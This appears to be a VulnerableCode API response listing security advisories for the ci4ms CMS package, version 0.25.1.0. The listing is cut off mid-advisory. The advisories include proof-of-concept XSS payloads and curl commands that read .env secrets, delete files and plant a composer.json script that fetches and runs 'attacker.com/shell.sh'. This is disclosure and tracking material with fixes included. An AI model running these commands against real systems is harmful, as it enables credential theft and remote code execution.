Look up vulnerable packages by Package URL.

GET /api/packages/955317?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/955317?format=api",
    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.25.1.0",
    "type": "composer",
    "namespace": "ci4-cms-erp",
    "name": "ci4ms",
    "version": "0.25.1.0",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "0.31.8.0",
    "latest_non_vulnerable_version": "0.31.8.0",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89558?format=api",
            "vulnerability_id": "VCID-12hw-23dd-9ud8",
            "summary": "CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary  \n### **Vulnerability: Stored DOM XSS via Methods Management Fields (Global Persistent Payload Execution)**  \n- Stored Cross-Site Scripting via Unsanitized Method Creation and Management Inputs  \n- Automatic Execution Across All Pages Where Method Is Rendered in Navigation  \n\n## Description  \nThe application fails to properly sanitize user-controlled input within the **Methods Management** functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding.\n\nThese stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in **Stored DOM-Based Cross-Site Scripting (XSS)**.\n\nCritically, because created methods are automatically rendered inside the system’s navigation/menu structure, the injected payload executes globally — meaning **every page visited where the malicious method appears in the menu triggers the XSS payload automatically**.\n\nThis significantly increases severity, as exploitation is not limited to a single view — it becomes a platform-wide persistent execution point.\n\n## Affected Functionality  \n- Methods creation functionality  \n- Methods management and listing functionality  \n- Administrative navigation rendering  \n- Permission-related UI rendering  \n- Global sidebar / menu rendering  \n- Storage and retrieval of method-related data  \n\n## Affected Fields  \nThe following fields accept unsanitized input and allow persistent JavaScript injection:\n- Page Name  \n- Description  \n- Controller  \n- Method Name  \n- Seflink  \n- Page Order  \n- Symbol (FontAwesome 5)  \n- Permissions  \n- Parent Page  \n- Module  \n\n## Attack Scenario  \n1. An attacker creates or edits a method.\n2. 
The attacker injects a malicious XSS payload into any vulnerable field (e.g., Page Name).\n3. The application stores the payload without sanitization or encoding.\n4. The method is automatically rendered inside the application’s navigation/menu.\n5. Every time any user visits any page where the menu is displayed, the malicious JavaScript executes automatically.\n\nBecause the navigation is globally rendered across backend pages, the XSS triggers on nearly every administrative page visit.\n\n## Impact  \n- Persistent Stored DOM XSS  \n- Automatic execution across multiple application pages  \n- Execution of arbitrary JavaScript in victims’ browsers  \n- Privilege escalation when viewed by administrators  \n- Full administrator account takeover  \n- Full account takeover across all roles  \n- Session hijacking  \n- CSRF token theft  \n- Complete compromise of the entire application  \n\nThis vulnerability is highly severe due to:\n- Persistent storage  \n- Global rendering surface  \n- Automatic execution without user interaction  \n- High likelihood of administrator exposure  \n\nEndpoints:\n- `/backend/methods/`  \n- `/backend/methods/create`  \n\n## Steps To Reproduce (POC)  \n1. Navigate to Methods Management → Create Method  \n2. Insert the following payload into Page Name (or any vulnerable field):  \n`<img src=x onerror=alert(document.domain)>`  \n3. Save the method  \n4. Navigate to any backend page  \n5. Observe the payload executing automatically wherever the malicious method appears in the menu  \n6. 
The XSS triggers across all pages where the navigation is rendered.\n\n## Remediation  \n- Never use `.html()`, `innerHTML`, or equivalent unsafe DOM sinks with untrusted data  \n- Implement strict output encoding (HTML entity encoding) before rendering user input  \n- Apply server-side input validation and sanitization  \n- Use contextual escaping depending on rendering context (HTML, attribute, JS, URL)  \n- Implement a strong Content Security Policy (CSP)  \n- Set cookies with HttpOnly, Secure, and SameSite flags  \n- Perform security review of all navigation rendering logic  \n\nFailure to properly encode and sanitize user-controlled method fields results in full application compromise through persistent global XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/CFsiQAJS#cBSF2lCMD7YNZEKYEjw3T8YturY92oBvrdRQ08gmw2A",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34558",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06184",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07262",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07305",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07329",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34558"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v77r-xg3p-75g7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:25:04Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v77r-xg3p-75g7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34558",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34558"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v77r-xg3p-75g7",
                    "reference_id": "GHSA-v77r-xg3p-75g7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v77r-xg3p-75g7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34558",
                "GHSA-v77r-xg3p-75g7"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-12hw-23dd-9ud8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89038?format=api",
            "vulnerability_id": "VCID-2kn3-qswm-p3ck",
            "summary": "CI4MS: Blogs Posts Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Blog Post Content (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Blog Post Content in Blog Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when creating or editing blog posts. An attacker can inject a malicious JavaScript payload into blog post content, which is then stored server-side.\n\nThis stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Blog post creation functionality\n- Blog post editing functionality\n- Blog post storage and retrieval logic\n\n### Attack Scenario\n- An attacker creates or edits a blog post to include a malicious XSS payload.\n- The application stores this content without sanitization or encoding.\n- The payload persists and executes whenever the blog post is rendered in affected views.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/blogs/create`\n- `/backend/blogs/`\n- `/blog/{id}`\n\n## Steps To Reproduce (POC)\n1. Go to the Blog Post Create or Edit page\n2. Insert an XSS payload into the blog post content such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save or publish the blog post\n4. View the post via the administrative panel or public blog page\n5. 
Notice the XSS payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\n https://mega.nz/file/bYtCQRqT#ph1S_01XaYXiNTzanP3AVL6aQMe0YC5Py7Gko1FoT4A",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34568",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05058",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05035",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05043",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06082",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34568"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:51:46Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x7wh-g25g-53vg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:51:46Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x7wh-g25g-53vg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34568",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34568"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x7wh-g25g-53vg",
                    "reference_id": "GHSA-x7wh-g25g-53vg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x7wh-g25g-53vg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34568",
                "GHSA-x7wh-g25g-53vg"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2kn3-qswm-p3ck"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89782?format=api",
            "vulnerability_id": "VCID-2v9s-x9dt-8ugb",
            "summary": "CI4MS has a Hidden Items Authorization Bypass in Fileeditor Allows Reading Secrets and Writing Protected Files\n## Summary\n\nThe Fileeditor controller defines a `hiddenItems` array containing security-sensitive paths (`.env`, `composer.json`, `vendor/`, `.git/`) but only enforces this protection in the `listFiles()` method. The `readFile()`, `saveFile()`, `deleteFileOrFolder()`, `renameFile()`, `createFile()`, and `createFolder()` endpoints perform no hidden items validation, allowing direct API access to files that are intended to be protected. A backend user with only `fileeditor.read` permission can exfiltrate application secrets from `.env`, and a user with `fileeditor.update` permission can overwrite `composer.json` to achieve remote code execution.\n\n## Details\n\nThe `hiddenItems` array is defined at `modules/Fileeditor/Controllers/Fileeditor.php:10-26`:\n\n```php\nprotected $hiddenItems = [\n    '.git', '.github', '.idea', '.vscode',\n    'node_modules', 'vendor', 'writable',\n    '.env', 'env', 'composer.json', 'composer.lock',\n    'tests', 'spark', 'phpunit.xml.dist', 'preload.php'\n];\n```\n\nThis array is checked **only** in `listFiles()` at lines 45-48 and 64:\n\n```php\n// Line 45-48 - path component check\nforeach ($pathParts as $part) {\n    if (in_array($part, $this->hiddenItems)) {\n        return $this->failForbidden();\n    }\n}\n// Line 64 - directory listing filter\nif (in_array($name, $this->hiddenItems)) continue;\n```\n\nHowever, `readFile()` (line 76) performs **neither** a `hiddenItems` check **nor** an `allowedFileTypes()` check:\n\n```php\npublic function readFile()\n{\n    // ... validation ...\n    $path = $this->request->getVar('path');\n    $fullPath = realpath(ROOTPATH . 
$path);\n    if (!$fullPath || !is_file($fullPath) || strpos($fullPath, realpath(ROOTPATH)) !== 0) {\n        return $this->response->setJSON(['error' => '...'])->setStatusCode(400);\n    }\n    return $this->response->setJSON(['content' => file_get_contents($fullPath)]);\n}\n```\n\nThis means any file within ROOTPATH — regardless of extension (`.php`, `.env`, etc.) — can be read by any user with the `fileeditor.read` permission.\n\nSimilarly, `saveFile()` (line 92) checks `allowedFileTypes()` but not `hiddenItems`. Since `json` is in `$allowedExtensions`, `composer.json` (which is explicitly in `hiddenItems`) can be overwritten:\n\n```php\nprotected $allowedExtensions = ['css', 'js', 'html', 'txt', 'json', 'sql', 'md'];\n```\n\n`deleteFileOrFolder()` (line 194) checks neither `hiddenItems` nor `allowedFileTypes()`.\n\n**Compounding factor:** CSRF protection is disabled for all fileeditor routes in `modules/Fileeditor/Config/FileeditorConfig.php:7-10`:\n\n```php\npublic $csrfExcept = [\n    'backend/fileeditor',\n    'backend/fileeditor/*',\n];\n```\n\nThis means the write and delete operations are additionally vulnerable to cross-site request forgery if an authenticated user visits a malicious page.\n\n## PoC\n\nRequires an authenticated backend session with `fileeditor.read` permission granted.\n\n**Step 1: Read .env file to extract secrets**\n```bash\ncurl -s -b 'ci_session=<valid_session_cookie>' \\\n  'https://target.com/backend/fileeditor/read?path=/.env'\n```\nExpected response: JSON containing `.env` file contents including database credentials, encryption keys, and other secrets.\n\n**Step 2: Read PHP configuration files**\n```bash\ncurl -s -b 'ci_session=<valid_session_cookie>' \\\n  'https://target.com/backend/fileeditor/read?path=/app/Config/Database.php'\n```\nExpected response: Full database configuration PHP source with credentials (note: `readFile()` has no `allowedFileTypes` check, so `.php` files are readable).\n\n**Step 3: Overwrite composer.json 
for RCE (requires `fileeditor.update` permission)**\n```bash\ncurl -s -b 'ci_session=<valid_session_cookie>' \\\n  -X POST 'https://target.com/backend/fileeditor/save' \\\n  -d 'path=/composer.json' \\\n  -d 'content={\"scripts\":{\"post-install-cmd\":\"curl attacker.com/shell.sh|sh\"}}'\n```\nThe next `composer install` or `composer update` executes the attacker's script.\n\n**Step 4: Delete .env (requires `fileeditor.delete` permission)**\n```bash\ncurl -s -b 'ci_session=<valid_session_cookie>' \\\n  -X POST 'https://target.com/backend/fileeditor/deleteFileOrFolder' \\\n  -d 'path=/.env'\n```\n\n## Impact\n\n- **Credential disclosure:** Any backend user with `fileeditor.read` permission can read `.env` (database passwords, encryption keys, API secrets, mail credentials) and any PHP configuration file regardless of extension restrictions.\n- **Remote code execution:** A user with `fileeditor.update` permission can overwrite `composer.json` with malicious composer scripts that execute on the next `composer install/update`.\n- **Denial of service:** A user with `fileeditor.delete` permission can delete `.env` or other critical configuration files, causing application failure.\n- **False security boundary:** Administrators who configure `fileeditor.read` as a limited permission for content editors are unknowingly granting access to all application secrets, since the `hiddenItems` protection only affects the UI file tree, not the API.\n\n## Recommended Fix\n\nApply `hiddenItems` validation to all endpoints that accept a `path` parameter. 
Extract the check into a reusable method and also add `allowedFileTypes` to `readFile()`:\n\n```php\n// Add this method to the Fileeditor controller\nprivate function isHiddenPath(string $path): bool\n{\n    $pathParts = explode('/', trim($path, '/'));\n    foreach ($pathParts as $part) {\n        if (in_array($part, $this->hiddenItems)) {\n            return true;\n        }\n    }\n    return false;\n}\n\n// Then add to readFile(), saveFile(), renameFile(), createFile(), \n// createFolder(), and deleteFileOrFolder():\nif ($this->isHiddenPath($path)) {\n    return $this->failForbidden();\n}\n\n// Additionally, add allowedFileTypes check to readFile():\nif (!$this->allowedFileTypes($fullPath)) {\n    return $this->failForbidden();\n}\n```\n\nAlso re-enable CSRF protection by removing the CSRF exemption in `FileeditorConfig.php` (lines 7-10) and ensuring the frontend sends CSRF tokens with requests.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39389",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07363",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07406",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07429",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00025",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07422",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39389"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-9rxp-f27p-wv3h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T20:28:40Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-9rxp-f27p-wv3h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39389",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39389"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9rxp-f27p-wv3h",
                    "reference_id": "GHSA-9rxp-f27p-wv3h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9rxp-f27p-wv3h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-39389",
                "GHSA-9rxp-f27p-wv3h"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2v9s-x9dt-8ugb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89551?format=api",
            "vulnerability_id": "VCID-4qss-f4ym-bbeh",
            "summary": "CI4MS: Logs Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM Blind XSS via Logs Interface Rendering (Administrative Context Execution)**\n- Stored Cross-Site Scripting (Blind XSS) via Unsafe Rendering of User-Controlled Logged Data\n\n### Description\nThe application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding.\n\nThis issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored within application logs and only executes later when an administrator views the logs page.\n\nFor example, accessing `/backend/backup/restore/xss-payload-here` causes an error that gets logged by the application. If the injected portion contains an XSS payload, it is stored inside the logs without sanitization and later rendered unsafely inside the logs management interface.\n\nWhen an administrator views the logs page, the stored payload executes automatically in the administrative browser context, leading to stored blind cross-site scripting (Blind XSS).\n\n### Affected Functionality\n- Application logging mechanism\n- Logs storage and retrieval logic\n- Logs rendering within administrative interface\n- Any endpoint that logs unsanitized user-controlled input\n\n### Attack Scenario\n- An attacker injects a malicious XSS payload into any user-controlled input that is logged by the application.\n- Example: Visit `/backend/backup/restore/<img src=x onerror=alert(document.domain)>`\n- The application throws an error and logs the malicious payload.\n- The payload is stored within application logs.\n- An administrator views the logs interface.\n- The payload executes automatically in the administrator’s browser context.\n\nAny method or endpoint that logs user-controlled input without sanitization will result in the same Blind XSS condition when viewed inside logs management.\n\n### Impact\n- Persistent Stored Blind XSS\n- Execution of arbitrary JavaScript in administrators’ browsers\n- Privilege escalation when viewed by administrators\n- Full administrator account takeover\n- 